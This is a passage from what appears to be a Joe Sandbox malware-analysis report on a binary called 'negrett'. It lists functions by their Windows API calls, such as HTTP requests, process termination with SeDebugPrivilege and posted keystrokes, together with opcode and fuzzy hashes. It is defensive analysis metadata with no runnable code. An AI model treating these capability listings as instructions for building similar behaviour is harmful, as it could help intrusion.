                                                  • Part of subcall function 00B429C8: GetLastError.KERNEL32(00000000,?,00B4D7D1,00000000,00000000,00000000,00000000,?,00B4D7F8,00000000,00000007,00000000,?,00B4DBF5,00000000,00000000), ref: 00B429F0
                                                • _free.LIBCMT ref: 00B42CA0
                                                • _free.LIBCMT ref: 00B42CAB
                                                • _free.LIBCMT ref: 00B42CB6
                                                • _free.LIBCMT ref: 00B42CC1
                                                • _free.LIBCMT ref: 00B42CCC
                                                • _free.LIBCMT ref: 00B42CD7
                                                • _free.LIBCMT ref: 00B42CE2
                                                • _free.LIBCMT ref: 00B42CED
                                                • _free.LIBCMT ref: 00B42CFB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 22b01c2edc8fbc798f4df4a31762c774177b3294f26ad74b381415d13fff956e
                                                • Instruction ID: a2143022d77fbb4ddb1544b0bce8b4bdf6a8ad191514c6b0e30f18f1fbad038b
                                                • Opcode Fuzzy Hash: 22b01c2edc8fbc798f4df4a31762c774177b3294f26ad74b381415d13fff956e
                                                • Instruction Fuzzy Hash: 83113F76510108AFDB02EF96D982CDD3BA9FF05350F9145A5FA489B322DA31EB50BB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: [L$[L
                                                • API String ID: 176396367-175131883
                                                • Opcode ID: 52fb84ed20a601a6362a334e9d3866de97d3c6e346f7c12375178c5f42add9b6
                                                • Instruction ID: fca41943caa189037ef2d8d9438c6cb9e3e76cf1015f3e5b9cd69337801882ac
                                                • Opcode Fuzzy Hash: 52fb84ed20a601a6362a334e9d3866de97d3c6e346f7c12375178c5f42add9b6
                                                • Instruction Fuzzy Hash: 80E1C532A00616ABCB25DF78C890BEDFBB5BF44754F54811AF956A7240EF30AD85CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B29BB2
                                                  • Part of subcall function 00B2912D: GetCursorPos.USER32(?), ref: 00B29141
                                                  • Part of subcall function 00B2912D: ScreenToClient.USER32(00000000,?), ref: 00B2915E
                                                  • Part of subcall function 00B2912D: GetAsyncKeyState.USER32 ref: 00B29183
                                                  • Part of subcall function 00B2912D: GetAsyncKeyState.USER32 ref: 00B2919D
                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00BA8B6B
                                                • ImageList_EndDrag.COMCTL32 ref: 00BA8B71
                                                • ReleaseCapture.USER32 ref: 00BA8B77
                                                • SetWindowTextW.USER32 ref: 00BA8C12
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BA8C25
                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00BA8CFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                • API String ID: 1924731296-2107944366
                                                • Opcode ID: bae42f7bbcd146c2384e94b4a3accd7d10cca5ff40281e6a824fdce67d9d71a9
                                                • Instruction ID: 001a8aa7b533e8028301be8b3ecac4001257e4274f200ff8606b3454346fc6fc
                                                • Opcode Fuzzy Hash: bae42f7bbcd146c2384e94b4a3accd7d10cca5ff40281e6a824fdce67d9d71a9
                                                • Instruction Fuzzy Hash: D751AB70108340AFD700DF14DC96FAE7BE4FB89710F500AA9F996572A2DB70A944CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: PgL$`gL$lgL$|gL
                                                • API String ID: 176396367-1235675864
                                                • Opcode ID: 04272a9f8043bf6173aa3c4bb54a4197faccdf722e489701af1eeecaaa0ab55d
                                                • Instruction ID: f64aeabd9a4150ac7b708949e606a3789c7f7850a8cf34904b7a3f5d6bb4631c
                                                • Opcode Fuzzy Hash: 04272a9f8043bf6173aa3c4bb54a4197faccdf722e489701af1eeecaaa0ab55d
                                                • Instruction Fuzzy Hash: 5D41D933E011369BCB115F7CCED06BE77A6AF50658B15812AF5A2D7281FB35C981C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B8C272
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B8C29A
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B8C2CA
                                                • GetLastError.KERNEL32 ref: 00B8C322
                                                • SetEvent.KERNEL32(?), ref: 00B8C336
                                                • InternetCloseHandle.WININET(00000000), ref: 00B8C341
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                • Opcode ID: b7e9bf6a0d130054b814c66cab49321aac5f8c0dc1d553df71ef18d92915bf0c
                                                • Instruction ID: 632e8af47ee5133ccbcfb9ffa77cfdb11911ad3cf7cd95aa682c75c3ac809826
                                                • Opcode Fuzzy Hash: b7e9bf6a0d130054b814c66cab49321aac5f8c0dc1d553df71ef18d92915bf0c
                                                • Instruction Fuzzy Hash: 613189F1600208AFD721AFA49C89AAB7FFCEB4A744B10855EF44693220DB34DD05CB74
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetParent.USER32 ref: 00B720AB
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00B720C0
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B7214D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1290815626-3381328864
                                                • Opcode ID: c719548a99dd73f097bf63a3b746020cb7bc958acf6833f9058bd0a25272b510
                                                • Instruction ID: 049321922e9997a891d4eeb722c808c0f2ea160986005dc9e76b25bb929b3540
                                                • Opcode Fuzzy Hash: c719548a99dd73f097bf63a3b746020cb7bc958acf6833f9058bd0a25272b510
                                                • Instruction Fuzzy Hash: FE112976688706B9FA116724DC07DA677DCEB05324F7040E7FB18B65E1FF6168015614
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadImageW.USER32 ref: 00B66890
                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B668A9
                                                • LoadImageW.USER32 ref: 00B668B9
                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B668D1
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B668F2
                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B28874,00000000,00000000,00000000,000000FF,00000000), ref: 00B66901
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B6691E
                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B28874,00000000,00000000,00000000,000000FF,00000000), ref: 00B6692D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                • String ID:
                                                • API String ID: 1268354404-0
                                                • Opcode ID: e90618561b3259f7af5c97c341f622b3a1cb74a48c90ee19f08f8178e3ba03f6
                                                • Instruction ID: 01eee41b42f6c8f9657bf60aba6b353c8b6736b08fcb2ed0d414041a49ce8062
                                                • Opcode Fuzzy Hash: e90618561b3259f7af5c97c341f622b3a1cb74a48c90ee19f08f8178e3ba03f6
                                                • Instruction Fuzzy Hash: EE518970A00209AFDB20CF28DC9AFAA7BF5EF58750F104558F91A972A0DB71E990DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B8C182
                                                • GetLastError.KERNEL32 ref: 00B8C195
                                                • SetEvent.KERNEL32(?), ref: 00B8C1A9
                                                  • Part of subcall function 00B8C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B8C272
                                                  • Part of subcall function 00B8C253: GetLastError.KERNEL32 ref: 00B8C322
                                                  • Part of subcall function 00B8C253: SetEvent.KERNEL32(?), ref: 00B8C336
                                                  • Part of subcall function 00B8C253: InternetCloseHandle.WININET(00000000), ref: 00B8C341
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 337547030-0
                                                • Opcode ID: 947cd8c1de3e2fc77d7e8608efd7432fa61da083f661d584016000d26e83fee2
                                                • Instruction ID: 17d82ed48464821c582f08f596331026598d23c83adcec23366dcdbaefc20ea1
                                                • Opcode Fuzzy Hash: 947cd8c1de3e2fc77d7e8608efd7432fa61da083f661d584016000d26e83fee2
                                                • Instruction Fuzzy Hash: 3C317AB1200601AFDB21AFA5DC48A66BFE8FF19300B00845DF95A83660DB31E814DBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B73A57
                                                  • Part of subcall function 00B73A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00B725B3), ref: 00B73A5E
                                                  • Part of subcall function 00B73A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00B73A65
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B725BD
                                                • PostMessageW.USER32 ref: 00B725DB
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B725DF
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B725E9
                                                • PostMessageW.USER32 ref: 00B72601
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B72605
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B7260F
                                                • PostMessageW.USER32 ref: 00B72623
                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B72627
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: caea2ca38c91bfa8ddbbe5b6a3b691f97a9d079f94c0e73293a5821f46a58266
                                                • Instruction ID: 6a0e48778b51899c7a36e0c428216a6aa7235758465eb9fd3afa1dc5938934ba
                                                • Opcode Fuzzy Hash: caea2ca38c91bfa8ddbbe5b6a3b691f97a9d079f94c0e73293a5821f46a58266
                                                • Instruction Fuzzy Hash: 9E01D431390210BBFB1067689C8BF593F99DB4EB12F204001F328AF0D1CDE264459A69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B7D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B7D501
                                                  • Part of subcall function 00B7D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B7D50F
                                                  • Part of subcall function 00B7D4DC: CloseHandle.KERNEL32(00000000), ref: 00B7D5DC
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B9A16D
                                                • GetLastError.KERNEL32 ref: 00B9A180
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B9A1B3
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B9A268
                                                • GetLastError.KERNEL32(00000000), ref: 00B9A273
                                                • CloseHandle.KERNEL32(00000000), ref: 00B9A2C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: 2a06070de5eeab69f6fa3d6747e4ea94d3a71ea1aeed84758616bea542a5af8e
                                                • Instruction ID: 24adec6b1c271b053e29e30cbdd57df808abd7813f005250fb80dc1cec2caf2c
                                                • Opcode Fuzzy Hash: 2a06070de5eeab69f6fa3d6747e4ea94d3a71ea1aeed84758616bea542a5af8e
                                                • Instruction Fuzzy Hash: A7615B30208241AFDB20DF18C495F55BBE1AF45318F5484DCE46A4B7A2CB76ED89CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: 51cf38135bccde0c85ac4edb66ba0f4fa312023aef09d76d849bce5d0aa12e49
                                                • Instruction ID: f7b33dfc830687d70d911c1eea0b8bf2b9edb89e87f91656b73c14e74d27e830
                                                • Opcode Fuzzy Hash: 51cf38135bccde0c85ac4edb66ba0f4fa312023aef09d76d849bce5d0aa12e49
                                                • Instruction Fuzzy Hash: CE11BB3168930ABAA7065B549C83DEABBDCDF15354F6040FFFA18A62D2E7606D005269
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _free$___from_strstr_to_strchr
                                                • String ID:
                                                • API String ID: 3409252457-0
                                                • Opcode ID: 9f0f20281c48753d05d8944911a4b82861b6959897dfc66cfb2c70a3aa9a6715
                                                • Instruction ID: 7b78f134e2511c621b98c664e76f657f42e83ea4d2adae4dddeec0e6fc36d558
                                                • Opcode Fuzzy Hash: 9f0f20281c48753d05d8944911a4b82861b6959897dfc66cfb2c70a3aa9a6715
                                                • Instruction Fuzzy Hash: 56612571941305AFDB20AFA4B9C0B6DBBA7AF05334F0402AFE945972C1EF329800CB56
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen$LocalTime
                                                • String ID:
                                                • API String ID: 952045576-0
                                                • Opcode ID: 38297000c25b436d2dec9fdd5d14abc055feed95da082f9dddee18c92f242421
                                                • Instruction ID: bbbd853508ac8f5a9582cc74b2c2942185e7eaa2c5e49bbbe1ea38432f64e878
                                                • Opcode Fuzzy Hash: 38297000c25b436d2dec9fdd5d14abc055feed95da082f9dddee18c92f242421
                                                • Instruction Fuzzy Hash: A3413465C1111879CB11EBB4CC8AACF77E8AF49710F6085E6F528E3121FB34E655C3A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 00BA2D1B
                                                • GetDC.USER32(00000000), ref: 00BA2D23
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA2D2E
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00BA2D3A
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BA2D76
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BA2D87
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BA2DC2
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BA2DE1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: f1fed79fc05526850a6eee0213c847ff12c95c6474873ce902af33431fd35836
                                                • Instruction ID: e1de7a505c2b1c2d9dcc7886f159cc463e5f70ee6883bd2572c34b43228f5fb9
                                                • Opcode Fuzzy Hash: f1fed79fc05526850a6eee0213c847ff12c95c6474873ce902af33431fd35836
                                                • Instruction Fuzzy Hash: 12316D72205214BBEB218F548C8AFEB3FA9EB0A715F044065FE489B291CA759C50C7A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: f574267dd208e8414daf43423a911871f3c4da1cc2f54f3bbf8c3215cc0c872d
                                                • Instruction ID: fab2af66cd997ff680879259de71ffa9b51fc21387fd6574e252dacaf005d85c
                                                • Opcode Fuzzy Hash: f574267dd208e8414daf43423a911871f3c4da1cc2f54f3bbf8c3215cc0c872d
                                                • Instruction Fuzzy Hash: 8221F671F402097BE6969A119D82F7E375DAE58285B044031FE08EF385FF38DD24CAA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: kL
                                                • API String ID: 176396367-491924299
                                                • Opcode ID: af21e6dbd2784cd6d5626297cf3271b9bc62aafdf5b90b252190d31c0118e202
                                                • Instruction ID: cf4879d59062f696501910dd6d3c1169f7dced26436ee95df04b8d58c7b43311
                                                • Opcode Fuzzy Hash: af21e6dbd2784cd6d5626297cf3271b9bc62aafdf5b90b252190d31c0118e202
                                                • Instruction Fuzzy Hash: 96B1C0316083029FCB10EF28C8D0A6AB7E5AFD4724F60896EF596C7291EF35D945CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2610073882-625585964
                                                • Opcode ID: a2f1882e47a21159626625fc08992f957c0cd4368ff0a36d163813e6505f9987
                                                • Instruction ID: 0bc26e2a7f04a56eb229b9c5ac153914c21afa3c7bffa24e6e27790311259a99
                                                • Opcode Fuzzy Hash: a2f1882e47a21159626625fc08992f957c0cd4368ff0a36d163813e6505f9987
                                                • Instruction Fuzzy Hash: 17919871900219ABDF24CFA4D884FAEBBF8EF46714F1085A9F505AB280D7749D46CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B7000E: CLSIDFromProgID.OLE32 ref: 00B7002B
